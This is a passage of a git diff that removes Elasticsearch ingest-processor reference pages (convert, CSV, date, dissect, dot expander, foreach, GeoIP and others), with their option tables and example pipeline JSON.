polygon is. - -Below is a table that aims to help capture how the radius of the circle affects the resulting number of sides -of the polygon given different inputs. - -The minimum number of sides is `4` and the maximum is `1000`. - -[[circle-processor-accuracy]] -.Circle Processor Accuracy -[options="header"] -|====== -| error_distance | radius in meters | number of sides of polygon -| 1.00 | 1.0 | 4 -| 1.00 | 10.0 | 14 -| 1.00 | 100.0 | 45 -| 1.00 | 1000.0 | 141 -| 1.00 | 10000.0 | 445 -| 1.00 | 100000.0 | 1000 -|====== diff --git a/docs/reference/ingest/processors/common-options.asciidoc b/docs/reference/ingest/processors/common-options.asciidoc deleted file mode 100644 index dcf8b63630b..00000000000 --- a/docs/reference/ingest/processors/common-options.asciidoc +++ /dev/null @@ -1,5 +0,0 @@ -| `if` | no | - | Conditionally execute this processor. -| `on_failure` | no | - | Handle failures for this processor. See <>. -| `ignore_failure` | no | `false` | Ignore failures for this processor. See <>. -| `tag` | no | - | An identifier for this processor. Useful for debugging and metrics. -// TODO: See <>. 
<-- for the if description once PR 35044 is merged \ No newline at end of file diff --git a/docs/reference/ingest/processors/convert.asciidoc b/docs/reference/ingest/processors/convert.asciidoc deleted file mode 100644 index 073c7933647..00000000000 --- a/docs/reference/ingest/processors/convert.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ -[[convert-processor]] -=== Convert processor -++++ -Convert -++++ - -Converts a field in the currently ingested document to a different type, such as converting a string to an integer. -If the field value is an array, all members will be converted. - -The supported types include: `integer`, `long`, `float`, `double`, `string`, `boolean`, and `auto`. - -Specifying `boolean` will set the field to true if its string value is equal to `true` (ignore case), to -false if its string value is equal to `false` (ignore case), or it will throw an exception otherwise. - -Specifying `auto` will attempt to convert the string-valued `field` into the closest non-string type. -For example, a field whose value is `"true"` will be converted to its respective boolean type: `true`. Do note -that float takes precedence of double in `auto`. A value of `"242.15"` will "automatically" be converted to -`242.15` of type `float`. If a provided field cannot be appropriately converted, the Convert Processor will -still process successfully and leave the field value as-is. In such a case, `target_field` will -still be updated with the unconverted field value. - -[[convert-options]] -.Convert Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field whose value is to be converted -| `target_field` | no | `field` | The field to assign the converted value to, by default `field` is updated in-place -| `type` | yes | - | The type to convert the existing value to -| `ignore_missing` | no | `false` | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -PUT _ingest/pipeline/my-pipeline-id -{ - "description": "converts the content of the id field to an integer", - "processors" : [ - { - "convert" : { - "field" : "id", - "type": "integer" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/csv.asciidoc b/docs/reference/ingest/processors/csv.asciidoc deleted file mode 100644 index e032fd3d9a1..00000000000 --- a/docs/reference/ingest/processors/csv.asciidoc +++ /dev/null @@ -1,39 +0,0 @@ -[[csv-processor]] -=== CSV processor -++++ -CSV -++++ - -Extracts fields from CSV line out of a single text field within a document. Any empty field in CSV will be skipped. - -[[csv-options]] -.CSV Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to extract data from -| `target_fields` | yes | - | The array of fields to assign extracted values to -| `separator` | no | , | Separator used in CSV, has to be single character string -| `quote` | no | " | Quote used in CSV, has to be single character string -| `ignore_missing` | no | `true` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `trim` | no | `false` | Trim whitespaces in unquoted fields -| `empty_value` | no | - | Value used to fill empty fields, empty fields will be skipped if this is not provided. 
- Empty field is one with no value (2 consecutive separators) or empty quotes (`""`) -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "csv": { - "field": "my_field", - "target_fields": ["field1", "field2"] - } -} --------------------------------------------------- -// NOTCONSOLE - -If the `trim` option is enabled then any whitespace in the beginning and in the end of each unquoted field will be trimmed. -For example with configuration above, a value of `A, B` will result in field `field2` -having value `{nbsp}B` (with space at the beginning). If `trim` is enabled `A, B` will result in field `field2` -having value `B` (no whitespace). Quoted fields will be left untouched. diff --git a/docs/reference/ingest/processors/date-index-name.asciidoc b/docs/reference/ingest/processors/date-index-name.asciidoc deleted file mode 100644 index e4607a0567c..00000000000 --- a/docs/reference/ingest/processors/date-index-name.asciidoc +++ /dev/null @@ -1,145 +0,0 @@ -[[date-index-name-processor]] -=== Date index name processor -++++ -Date index name -++++ - -The purpose of this processor is to point documents to the right time based index based -on a date or timestamp field in a document by using the <>. - -The processor sets the `_index` metadata field with a date math index name expression based on the provided index name -prefix, a date or timestamp field in the documents being processed and the provided date rounding. - -First, this processor fetches the date or timestamp from a field in the document being processed. Optionally, -date formatting can be configured on how the field's value should be parsed into a date. Then this date, -the provided index name prefix and the provided date rounding get formatted into a date math index name expression. -Also here optionally date formatting can be specified on how the date should be formatted into a date math index name -expression. - -An example pipeline that points documents to a monthly index that starts with a `my-index-` prefix based on a -date in the `date1` field: - -[source,console] --------------------------------------------------- -PUT _ingest/pipeline/monthlyindex -{ - "description": "monthly date-time index naming", - "processors" : [ - { - "date_index_name" : { - "field" : "date1", - "index_name_prefix" : "my-index-", - "date_rounding" : "M" - } - } - ] -} --------------------------------------------------- - - -Using that pipeline for an index request: - -[source,console] --------------------------------------------------- -PUT /my-index/_doc/1?pipeline=monthlyindex -{ - "date1" : "2016-04-25T12:02:01.789Z" -} --------------------------------------------------- -// TEST[continued] - -[source,console-result] --------------------------------------------------- -{ - "_index" : "my-index-2016-04-01", - "_type" : "_doc", - "_id" : "1", - "_version" : 1, - "result" : "created", - "_shards" : { - "total" : 2, - "successful" : 1, - "failed" : 0 - }, - "_seq_no" : 55, - "_primary_term" : 1 -} --------------------------------------------------- -// TESTRESPONSE[s/"_seq_no" : \d+/"_seq_no" : $body._seq_no/ s/"_primary_term" : 1/"_primary_term" : $body._primary_term/] - - -The above request will not index this document into the `my-index` index, but into the `my-index-2016-04-01` index because -it was rounded by month. This is because the date-index-name-processor overrides the `_index` property of the document. 
- -To see the date-math value of the index supplied in the actual index request which resulted in the above document being -indexed into `my-index-2016-04-01` we can inspect the effects of the processor using a simulate request. - - -[source,console] --------------------------------------------------- -POST _ingest/pipeline/_simulate -{ - "pipeline" : - { - "description": "monthly date-time index naming", - "processors" : [ - { - "date_index_name" : { - "field" : "date1", - "index_name_prefix" : "my-index-", - "date_rounding" : "M" - } - } - ] - }, - "docs": [ - { - "_source": { - "date1": "2016-04-25T12:02:01.789Z" - } - } - ] -} --------------------------------------------------- - -and the result: - -[source,console-result] --------------------------------------------------- -{ - "docs" : [ - { - "doc" : { - "_id" : "_id", - "_index" : "", - "_type" : "_doc", - "_source" : { - "date1" : "2016-04-25T12:02:01.789Z" - }, - "_ingest" : { - "timestamp" : "2016-11-08T19:43:03.850+0000" - } - } - } - ] -} --------------------------------------------------- -// TESTRESPONSE[s/2016-11-08T19:43:03.850\+0000/$body.docs.0.doc._ingest.timestamp/] - -The above example shows that `_index` was set to ``. Elasticsearch -understands this to mean `2016-04-01` as is explained in the <> - -[[date-index-name-options]] -.Date index name options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the date or timestamp from. -| `index_name_prefix` | no | - | A prefix of the index name to be prepended before the printed date. Supports <>. -| `date_rounding` | yes | - | How to round the date when formatting the date into the index name. Valid values are: `y` (year), `M` (month), `w` (week), `d` (day), `h` (hour), `m` (minute) and `s` (second). Supports <>. -| `date_formats` | no | yyyy-MM-dd+++'T'+++HH:mm:ss.SSSXX | An array of the expected date formats for parsing dates / timestamps in the document being preprocessed. Can be a java time pattern or one of the following formats: ISO8601, UNIX, UNIX_MS, or TAI64N. -| `timezone` | no | UTC | The timezone to use when parsing the date and when date math index supports resolves expressions into concrete index names. -| `locale` | no | ENGLISH | The locale to use when parsing the date from the document being preprocessed, relevant when parsing month names or week days. -| `index_name_format` | no | yyyy-MM-dd | The format to be used when printing the parsed date into the index name. A valid java time pattern is expected here. Supports <>. -include::common-options.asciidoc[] -|====== diff --git a/docs/reference/ingest/processors/date.asciidoc b/docs/reference/ingest/processors/date.asciidoc deleted file mode 100644 index ae05afa422c..00000000000 --- a/docs/reference/ingest/processors/date.asciidoc +++ /dev/null @@ -1,69 +0,0 @@ -[[date-processor]] -=== Date processor -++++ -Date -++++ - -Parses dates from fields, and then uses the date or timestamp as the timestamp for the document. -By default, the date processor adds the parsed date as a new field called `@timestamp`. You can specify a -different field by setting the `target_field` configuration parameter. Multiple date formats are supported -as part of the same date processor definition. They will be used sequentially to attempt parsing the date field, -in the same order they were defined as part of the processor definition. 
- -[[date-options]] -.Date options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the date from. -| `target_field` | no | @timestamp | The field that will hold the parsed date. -| `formats` | yes | - | An array of the expected date formats. Can be a <> or one of the following formats: ISO8601, UNIX, UNIX_MS, or TAI64N. -| `timezone` | no | UTC | The timezone to use when parsing the date. Supports <>. -| `locale` | no | ENGLISH | The locale to use when parsing the date, relevant when parsing month names or week days. Supports <>. -| `output_format` | no | `yyyy-MM-dd'T'HH:mm:ss.SSSXXX` | The format to use when writing the date to `target_field`. Can be a <> or one of the following formats: ISO8601, UNIX, UNIX_MS, or TAI64N. -include::common-options.asciidoc[] -|====== - -Here is an example that adds the parsed date to the `timestamp` field based on the `initial_date` field: - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors" : [ - { - "date" : { - "field" : "initial_date", - "target_field" : "timestamp", - "formats" : ["dd/MM/yyyy HH:mm:ss"], - "timezone" : "Europe/Amsterdam" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The `timezone` and `locale` processor parameters are templated. This means that their values can be -extracted from fields within documents. The example below shows how to extract the locale/timezone -details from existing fields, `my_timezone` and `my_locale`, in the ingested document that contain -the timezone and locale values. - -[source,js] --------------------------------------------------- -{ - "description" : "...", - "processors" : [ - { - "date" : { - "field" : "initial_date", - "target_field" : "timestamp", - "formats" : ["ISO8601"], - "timezone" : "{{my_timezone}}", - "locale" : "{{my_locale}}" - } - } - ] -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/dissect.asciidoc b/docs/reference/ingest/processors/dissect.asciidoc deleted file mode 100644 index b7c5fbaf952..00000000000 --- a/docs/reference/ingest/processors/dissect.asciidoc +++ /dev/null @@ -1,201 +0,0 @@ -[[dissect-processor]] -=== Dissect processor -++++ -Dissect -++++ - - -Similar to the <>, dissect also extracts structured fields out of a single text field -within a document. However unlike the <>, dissect does not use -{wikipedia}/Regular_expression[Regular Expressions]. This allows dissect's syntax to be simple and for -some cases faster than the <>. - -Dissect matches a single text field against a defined pattern. 
- -For example, the following pattern: -[source,txt] --------------------------------------------------- -%{clientip} %{ident} %{auth} [%{@timestamp}] \"%{verb} %{request} HTTP/%{httpversion}\" %{status} %{size} --------------------------------------------------- -will match a log line of this format: -[source,txt] --------------------------------------------------- -1.2.3.4 - - [30/Apr/1998:22:00:52 +0000] \"GET /english/venues/cities/images/montpellier/18.gif HTTP/1.0\" 200 3171 --------------------------------------------------- -and result in a document with the following fields: -[source,js] --------------------------------------------------- -"doc": { -  "_index": "_index", -  "_type": "_type", -  "_id": "_id", -  "_source": { -    "request": "/english/venues/cities/images/montpellier/18.gif", -    "auth": "-", -    "ident": "-", -    "verb": "GET", -    "@timestamp": "30/Apr/1998:22:00:52 +0000", -    "size": "3171", -    "clientip": "1.2.3.4", -    "httpversion": "1.0", -    "status": "200" -  } -} --------------------------------------------------- -// NOTCONSOLE - -A dissect pattern is defined by the parts of the string that will be discarded. In the example above, the first part -to be discarded is a single space. Dissect finds this space, then assigns everything up -until that space as the value of `clientip`. -Later, dissect matches the `[` and then `]` and then assigns `@timestamp` to everything in-between `[` and `]`. -Paying special attention to the parts of the string to discard will help build successful dissect patterns. - -Successful matches require all keys in a pattern to have a value. If any of the `%{keyname}` defined in the pattern do -not have a value, then an exception is thrown and may be handled by the <> directive. -An empty key `%{}` or a <> can be used to match values, but exclude the value from -the final document. All matched values are represented as string data types. The <> -may be used to convert to the expected data type. - -Dissect also supports <> that can change dissect's default -behavior. For example, you can instruct dissect to ignore certain fields, append fields, skip over padding, etc. -See <> for more information. - -[[dissect-options]] -.Dissect Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to dissect -| `pattern` | yes | - | The pattern to apply to the field -| `append_separator`| no | "" (empty string) | The character(s) that separate the appended fields. -| `ignore_missing` | no | false | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ -  "dissect": { -    "field": "message", -    "pattern" : "%{clientip} %{ident} %{auth} [%{@timestamp}] \"%{verb} %{request} HTTP/%{httpversion}\" %{status} %{size}" -   } -} --------------------------------------------------- -// NOTCONSOLE - -[[dissect-key-modifiers]] -==== Dissect key modifiers -Key modifiers can change the default behavior for dissection. Key modifiers may be found on the left or right -of the `%{keyname}`, always inside the `%{` and `}`. For example `%{+keyname ->}` has the append and right padding -modifiers.
- -[[dissect-key-modifiers-table]] -.Dissect Key Modifiers -[options="header"] -|====== -| Modifier | Name | Position | Example | Description | Details -| `->` | Skip right padding | (far) right | `%{keyname1->}` | Skips any repeated characters to the right | <> -| `+` | Append | left | `%{+keyname} %{+keyname}` | Appends two or more fields together | <> -| `+` with `/n` | Append with order | left and right | `%{+keyname/2} %{+keyname/1}` | Appends two or more fields together in the order specified | <> -| `?` | Named skip key | left | `%{?ignoreme}` | Skips the matched value in the output. Same behavior as `%{}`| <> -| `*` and `&` | Reference keys | left | `%{*r1} %{&r1}` | Sets the output key as value of `*` and output value of `&` | <> -|====== - -[[dissect-modifier-skip-right-padding]] -===== Right padding modifier (`->`) - -The algorithm that performs the dissection is very strict in that it requires all characters in the pattern to match -the source string. For example, the pattern `%{fookey} %{barkey}` (1 space), will match the string "foo{nbsp}bar" -(1 space), but will not match the string "foo{nbsp}{nbsp}bar" (2 spaces) since the pattern has only 1 space and the -source string has 2 spaces. - -The right padding modifier helps with this case. Adding the right padding modifier to the pattern `%{fookey->} %{barkey}`, -It will now will match "foo{nbsp}bar" (1 space) and "foo{nbsp}{nbsp}bar" (2 spaces) -and even "foo{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}bar" (10 spaces). - -Use the right padding modifier to allow for repetition of the characters after a `%{keyname->}`. - -The right padding modifier may be placed on any key with any other modifiers. It should always be the furthest right -modifier. For example: `%{+keyname/1->}` and `%{->}` - -Right padding modifier example -|====== -| *Pattern* | `%{ts->} %{level}` -| *Input* | 1998-08-10T17:15:42,466{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}WARN -| *Result* a| -* ts = 1998-08-10T17:15:42,466 -* level = WARN -|====== - -The right padding modifier may be used with an empty key to help skip unwanted data. For example, the same input string, but wrapped with brackets requires the use of an empty right padded key to achieve the same result. - -Right padding modifier with empty key example -|====== -| *Pattern* | `[%{ts}]%{->}[%{level}]` -| *Input* | [1998-08-10T17:15:42,466]{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}{nbsp}[WARN] -| *Result* a| -* ts = 1998-08-10T17:15:42,466 -* level = WARN -|====== - -[[append-modifier]] -===== Append modifier (`+`) -[[dissect-modifier-append-key]] -Dissect supports appending two or more results together for the output. -Values are appended left to right. An append separator can be specified. -In this example the append_separator is defined as a space. - -Append modifier example -|====== -| *Pattern* | `%{+name} %{+name} %{+name} %{+name}` -| *Input* | john jacob jingleheimer schmidt -| *Result* a| -* name = john jacob jingleheimer schmidt -|====== - -[[append-order-modifier]] -===== Append with order modifier (`+` and `/n`) -[[dissect-modifier-append-key-with-order]] -Dissect supports appending two or more results together for the output. -Values are appended based on the order defined (`/n`). An append separator can be specified. -In this example the append_separator is defined as a comma. 
- -Append with order modifier example -|====== -| *Pattern* | `%{+name/2} %{+name/4} %{+name/3} %{+name/1}` -| *Input* | john jacob jingleheimer schmidt -| *Result* a| -* name = schmidt,john,jingleheimer,jacob -|====== - -[[named-skip-key]] -===== Named skip key (`?`) -[[dissect-modifier-named-skip-key]] -Dissect supports ignoring matches in the final result. This can be done with an empty key `%{}`, but for readability -it may be desired to give that empty key a name. - -Named skip key modifier example -|====== -| *Pattern* | `%{clientip} %{?ident} %{?auth} [%{@timestamp}]` -| *Input* | 1.2.3.4 - - [30/Apr/1998:22:00:52 +0000] -| *Result* a| -* clientip = 1.2.3.4 -* @timestamp = 30/Apr/1998:22:00:52 +0000 -|====== - -[[reference-keys]] -===== Reference keys (`*` and `&`) -[[dissect-modifier-reference-keys]] -Dissect support using parsed values as the key/value pairings for the structured content. Imagine a system that -partially logs in key/value pairs. Reference keys allow you to maintain that key/value relationship. - -Reference key modifier example -|====== -| *Pattern* | `[%{ts}] [%{level}] %{*p1}:%{&p1} %{*p2}:%{&p2}` -| *Input* | [2018-08-10T17:15:42,466] [ERR] ip:1.2.3.4 error:REFUSED -| *Result* a| -* ts = 1998-08-10T17:15:42,466 -* level = ERR -* ip = 1.2.3.4 -* error = REFUSED -|====== diff --git a/docs/reference/ingest/processors/dot-expand.asciidoc b/docs/reference/ingest/processors/dot-expand.asciidoc deleted file mode 100644 index 13cc6e72145..00000000000 --- a/docs/reference/ingest/processors/dot-expand.asciidoc +++ /dev/null @@ -1,122 +0,0 @@ -[[dot-expand-processor]] -=== Dot expander processor -++++ -Dot expander -++++ - -Expands a field with dots into an object field. This processor allows fields -with dots in the name to be accessible by other processors in the pipeline. -Otherwise these <> can't be accessed by any processor. - -[[dot-expander-options]] -.Dot Expand Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to expand into an object field -| `path` | no | - | The field that contains the field to expand. Only required if the field to expand is part another object field, because the `field` option can only understand leaf fields. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ - "dot_expander": { - "field": "foo.bar" - } -} --------------------------------------------------- -// NOTCONSOLE - -For example the dot expand processor would turn this document: - -[source,js] --------------------------------------------------- -{ - "foo.bar" : "value" -} --------------------------------------------------- -// NOTCONSOLE - -into: - -[source,js] --------------------------------------------------- -{ - "foo" : { - "bar" : "value" - } -} --------------------------------------------------- -// NOTCONSOLE - -If there is already a `bar` field nested under `foo` then -this processor merges the `foo.bar` field into it. If the field is -a scalar value then it will turn that field into an array field. 
- -For example, the following document: - -[source,js] --------------------------------------------------- -{ -  "foo.bar" : "value2", -  "foo" : { -    "bar" : "value1" -  } -} --------------------------------------------------- -// NOTCONSOLE - -is transformed by the `dot_expander` processor into: - -[source,js] --------------------------------------------------- -{ -  "foo" : { -    "bar" : ["value1", "value2"] -  } -} --------------------------------------------------- -// NOTCONSOLE - -If any field outside of the leaf field conflicts with a pre-existing field of the same name, -then that field needs to be renamed first. - -Consider the following document: - -[source,js] --------------------------------------------------- -{ -  "foo": "value1", -  "foo.bar": "value2" -} --------------------------------------------------- -// NOTCONSOLE - -Here the `foo` field needs to be renamed before the `dot_expander` -processor is applied. So in order for the `foo.bar` field to properly -be expanded into the `bar` field under the `foo` field, the following -pipeline should be used: - -[source,js] --------------------------------------------------- -{ -  "processors" : [ -    { -      "rename" : { -        "field" : "foo", -        "target_field" : "foo.bar" -      } -    }, -    { -      "dot_expander": { -        "field": "foo.bar" -      } -    } -  ] -} --------------------------------------------------- -// NOTCONSOLE - -The reason for this is that Ingest doesn't know how to automatically cast -a scalar field to an object field. diff --git a/docs/reference/ingest/processors/drop.asciidoc b/docs/reference/ingest/processors/drop.asciidoc deleted file mode 100644 index 18d9d311ac0..00000000000 --- a/docs/reference/ingest/processors/drop.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[[drop-processor]] -=== Drop processor -++++ -Drop -++++ - -Drops the document without raising any errors. This is useful to prevent the document from -getting indexed based on some condition. - -[[drop-options]] -.Drop Options -[options="header"] -|====== -| Name | Required | Default | Description -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ -  "drop": { -    "if" : "ctx.network_name == 'Guest'" -  } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/enrich.asciidoc b/docs/reference/ingest/processors/enrich.asciidoc deleted file mode 100644 index 26fb2f1769c..00000000000 --- a/docs/reference/ingest/processors/enrich.asciidoc +++ /dev/null @@ -1,26 +0,0 @@ -[role="xpack"] -[testenv="basic"] -[[enrich-processor]] -=== Enrich processor -++++ -Enrich -++++ - -The `enrich` processor can enrich documents with data from another index. -See the <> section for more information about how to set this up. - -[[enrich-options]] -.Enrich Options -[options="header"] -|====== -| Name | Required | Default | Description -| `policy_name` | yes | - | The name of the enrich policy to use. -| `field` | yes | - | The field in the input document that matches the policy's `match_field` used to retrieve the enrichment data. Supports <>. -| `target_field` | yes | - | Field added to incoming documents to contain enrich data. This field contains both the `match_field` and `enrich_fields` specified in the <>. Supports <>. -| `ignore_missing` | no | false | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `override` | no | true | If `true`, the processor updates fields that already have a non-null value.
When set to `false`, such fields will not be touched. -| `max_matches` | no | 1 | The maximum number of matched documents to include under the configured target field. The `target_field` will be turned into a JSON array if `max_matches` is higher than 1, otherwise `target_field` will become a JSON object. In order to avoid documents getting too large, the maximum allowed value is 128. -| `shape_relation` | no | `INTERSECTS` | A spatial relation operator used to match the <> of incoming documents to documents in the enrich index. This option is only used for `geo_match` enrich policy types. The <> mapping parameter determines which spatial relation operators are available. See <<_spatial_relations>> for operators and more information. - -include::common-options.asciidoc[] -|====== diff --git a/docs/reference/ingest/processors/fail.asciidoc b/docs/reference/ingest/processors/fail.asciidoc deleted file mode 100644 index 4446b941db3..00000000000 --- a/docs/reference/ingest/processors/fail.asciidoc +++ /dev/null @@ -1,29 +0,0 @@ -[[fail-processor]] -=== Fail processor -++++ -Fail -++++ - -Raises an exception. This is useful when -you expect a pipeline to fail and want to relay a specific message -to the requester. - -[[fail-options]] -.Fail Options -[options="header"] -|====== -| Name | Required | Default | Description -| `message` | yes | - | The error message thrown by the processor. Supports <>. -include::common-options.asciidoc[] -|====== - -[source,js] --------------------------------------------------- -{ -  "fail": { -    "if" : "ctx.tags.contains('production') != true", -    "message": "The production tag is not present, found tags: {{tags}}" -  } -} --------------------------------------------------- -// NOTCONSOLE diff --git a/docs/reference/ingest/processors/foreach.asciidoc b/docs/reference/ingest/processors/foreach.asciidoc deleted file mode 100644 index 7a8c29ff24a..00000000000 --- a/docs/reference/ingest/processors/foreach.asciidoc +++ /dev/null @@ -1,163 +0,0 @@ -[[foreach-processor]] -=== Foreach processor -++++ -Foreach -++++ - -Processes elements in an array of unknown length. - -All processors can operate on elements inside an array, but if all elements of an array need to -be processed in the same way, defining a processor for each element becomes cumbersome and tricky -because it is likely that the number of elements in an array is unknown. For this reason the `foreach` -processor exists. By specifying the field holding array elements and a processor that -defines what should happen to each element, array fields can easily be preprocessed. - -A processor inside the foreach processor works in the array element context and puts that element in the ingest metadata -under the `_ingest._value` key. If the array element is a JSON object, `_ingest._value` holds all immediate fields of that object; -if the element is a scalar value, `_ingest._value` just holds that value. Note that if a processor prior to the -`foreach` processor used the `_ingest._value` key, then the specified value will not be available to the processor inside -the `foreach` processor. The `foreach` processor does restore the original value, so that value is available to processors -after the `foreach` processor. - -Note that any other fields of the document remain accessible and modifiable, as with all other processors. This processor -just puts the current array element being read into the `_ingest._value` ingest metadata attribute, so that it may be -pre-processed.
- -If the `foreach` processor fails to process an element inside the array, and no `on_failure` processor has been specified, -then it aborts the execution and leaves the array unmodified. - -[[foreach-options]] -.Foreach Options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The array field -| `processor` | yes | - | The processor to execute against each field -| `ignore_missing` | no | false | If `true` and `field` does not exist or is `null`, the processor quietly exits without modifying the document -include::common-options.asciidoc[] -|====== - -Assume the following document: - -[source,js] --------------------------------------------------- -{ - "values" : ["foo", "bar", "baz"] -} --------------------------------------------------- -// NOTCONSOLE - -When this `foreach` processor operates on this sample document: - -[source,js] --------------------------------------------------- -{ - "foreach" : { - "field" : "values", - "processor" : { - "uppercase" : { - "field" : "_ingest._value" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -Then the document will look like this after preprocessing: - -[source,js] --------------------------------------------------- -{ - "values" : ["FOO", "BAR", "BAZ"] -} --------------------------------------------------- -// NOTCONSOLE - -Let's take a look at another example: - -[source,js] --------------------------------------------------- -{ - "persons" : [ - { - "id" : "1", - "name" : "John Doe" - }, - { - "id" : "2", - "name" : "Jane Doe" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -In this case, the `id` field needs to be removed, -so the following `foreach` processor is used: - -[source,js] --------------------------------------------------- -{ - "foreach" : { - "field" : "persons", - "processor" : { - "remove" : { - "field" : "_ingest._value.id" - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -After preprocessing the result is: - -[source,js] --------------------------------------------------- -{ - "persons" : [ - { - "name" : "John Doe" - }, - { - "name" : "Jane Doe" - } - ] -} --------------------------------------------------- -// NOTCONSOLE - -The wrapped processor can have a `on_failure` definition. -For example, the `id` field may not exist on all person objects. -Instead of failing the index request, you can use an `on_failure` -block to send the document to the 'failure_index' index for later inspection: - -[source,js] --------------------------------------------------- -{ - "foreach" : { - "field" : "persons", - "processor" : { - "remove" : { - "field" : "_value.id", - "on_failure" : [ - { - "set" : { - "field": "_index", - "value": "failure_index" - } - } - ] - } - } - } -} --------------------------------------------------- -// NOTCONSOLE - -In this example, if the `remove` processor does fail, then -the array elements that have been processed thus far will -be updated. - -Another advanced example can be found in the {plugins}/ingest-attachment-with-arrays.html[attachment processor documentation]. 
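As noted above, fields outside of `_ingest._value` remain accessible from the wrapped processor, for example through template snippets. Here is a hedged sketch (the top-level `environment` field is made up for illustration) that copies a document-level field onto every object in the `persons` array:

[source,js]
--------------------------------------------------
{
  "foreach" : {
    "field" : "persons",
    "processor" : {
      "set" : {
        "field" : "_ingest._value.environment",
        "value" : "{{environment}}"
      }
    }
  }
}
--------------------------------------------------
// NOTCONSOLE

Each element of `persons` would end up with an `environment` field whose value is copied from the document's top-level `environment` field.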
diff --git a/docs/reference/ingest/processors/geoip.asciidoc b/docs/reference/ingest/processors/geoip.asciidoc deleted file mode 100644 index 92ed0a09dc7..00000000000 --- a/docs/reference/ingest/processors/geoip.asciidoc +++ /dev/null @@ -1,316 +0,0 @@ -[[geoip-processor]] -=== GeoIP processor -++++ -GeoIP -++++ - -The `geoip` processor adds information about the geographical location of IP addresses, based on data from the Maxmind databases. -This processor adds this information by default under the `geoip` field. The `geoip` processor can resolve both IPv4 and -IPv6 addresses. - -The `ingest-geoip` module ships by default with the GeoLite2 City, GeoLite2 Country and GeoLite2 ASN GeoIP2 databases from Maxmind made available -under the CCA-ShareAlike 4.0 license. For more details see, http://dev.maxmind.com/geoip/geoip2/geolite2/ - -The `geoip` processor can run with other city, country and ASN GeoIP2 databases -from Maxmind. The database files must be copied into the `ingest-geoip` config -directory located at `$ES_CONFIG/ingest-geoip`. Custom database files must be -stored uncompressed and the extension must be `-City.mmdb`, `-Country.mmdb`, or -`-ASN.mmdb` to indicate the type of the database. These database files can not -have the same filename as any of the built-in database names. The -`database_file` processor option is used to specify the filename of the custom -database to use for the processor. - -[[using-ingest-geoip]] -==== Using the `geoip` Processor in a Pipeline - -[[ingest-geoip-options]] -.`geoip` options -[options="header"] -|====== -| Name | Required | Default | Description -| `field` | yes | - | The field to get the ip address from for the geographical lookup. -| `target_field` | no | geoip | The field that will hold the geographical information looked up from the Maxmind database. -| `database_file` | no | GeoLite2-City.mmdb | The database filename referring to a database the module ships with (GeoLite2-City.mmdb, GeoLite2-Country.mmdb, or GeoLite2-ASN.mmdb) or a custom database in the `ingest-geoip` config directory. -| `properties` | no | [`continent_name`, `country_iso_code`, `country_name`, `region_iso_code`, `region_name`, `city_name`, `location`] * | Controls what properties are added to the `target_field` based on the geoip lookup. -| `ignore_missing` | no | `false` | If `true` and `field` does not exist, the processor quietly exits without modifying the document -| `first_only` | no | `true` | If `true` only first found geoip data will be returned, even if `field` contains array -|====== - -*Depends on what is available in `database_file`: - -* If the GeoLite2 City database is used, then the following fields may be added under the `target_field`: `ip`, -`country_iso_code`, `country_name`, `continent_name`, `region_iso_code`, `region_name`, `city_name`, `timezone`, `latitude`, `longitude` -and `location`. The fields actually added depend on what has been found and which properties were configured in `properties`. -* If the GeoLite2 Country database is used, then the following fields may be added under the `target_field`: `ip`, -`country_iso_code`, `country_name` and `continent_name`. The fields actually added depend on what has been found and which properties -were configured in `properties`. -* If the GeoLite2 ASN database is used, then the following fields may be added under the `target_field`: `ip`, -`asn`, `organization_name` and `network`. The fields actually added depend on what has been found and which properties were configured -in `properties`. 
